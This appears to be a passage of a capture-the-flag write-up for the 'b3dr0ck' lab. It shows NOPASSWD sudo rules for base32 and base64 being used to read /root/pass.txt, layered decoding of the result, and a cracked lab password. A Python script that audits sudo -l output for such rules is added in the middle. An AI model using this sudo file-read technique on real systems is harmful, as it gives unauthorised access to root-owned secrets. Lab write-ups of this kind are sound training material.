fred
Checking for sudo privileges of the fred user after making the lateral movement
fred@b3dr0ck:~$ sudo -l
Matching Defaults entries for fred on b3dr0ck:
insults, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User fred may run the following commands on b3dr0ck:
(ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
(ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt
The fred user is able to read the /root/pass.txt file via base32 and base64
fred@b3dr0ck:~$ sudo -u root /usr/bin/base64 /root/pass.txt
TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dO
QkdYVVJUTEpaS0ZTU1lLCg==
┌──(kali㉿kali)-[~/archive/thm/b3dr0ck]
└─$ echo TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dOQkdYVVJUTEpaS0ZTU1lLCg== | base64 -d | base32 -d | base64 -d
a00a12aad6b7c16bf07032bd05a31d56
It turns out that the credential hash was encoded in several layers using base64 and base32; decoding base64, then base32, then base64 recovers it.
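The sudo rules shown above are what exposed /root/pass.txt, since an encoder run as root simply prints the file in a reversible form. As an added example (not part of the original writeup), this is one way to audit `sudo -l` output for rules of that kind; the function name `audit_sudo_rules` and the `FILE_READERS` list are assumptions made for illustration, and the list is not exhaustive.

```python
import re
from pathlib import PurePosixPath

# Assumption: a short, non-exhaustive set of utilities that print file contents.
FILE_READERS = {"base32", "base64", "cat", "head", "tail", "xxd", "od", "hexdump"}

# Matches rule lines such as "(ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$"
)

def audit_sudo_rules(sudo_l_output):
    """Return one finding per sudo rule that lets the user dump a file's contents."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines, headers, blank lines
        if PurePosixPath(m["cmd"]).name not in FILE_READERS:
            continue
        runas_user = m["runas"].split(":")[0].strip()
        findings.append({
            "binary": m["cmd"],
            "runas": runas_user,
            "nopasswd": "NOPASSWD:" in m["tags"],
            # Absolute paths in the argument list are the files the rule exposes.
            "files": [a for a in m["args"].split() if a.startswith("/")],
            # ALL or root as the run-as user means root-owned files are readable.
            "as_root": runas_user in ("ALL", "root"),
        })
    return findings

# The two rules from the sudo -l output above, plus one constructed harmless rule.
SAMPLE = """\
User fred may run the following commands on b3dr0ck:
    (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
    (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt
    (root) /usr/bin/systemctl status cron
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE):
        print(f"{f['binary']} as {f['runas']} nopasswd={f['nopasswd']} exposes {f['files']}")
```

Any finding with `as_root` and `nopasswd` both true is a rule worth removing or replacing with a purpose-built, non-disclosing command.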
Password Cracking
Password hash cracked:
flintstonesvitamins
Moving on to the Privilege Escalation phase.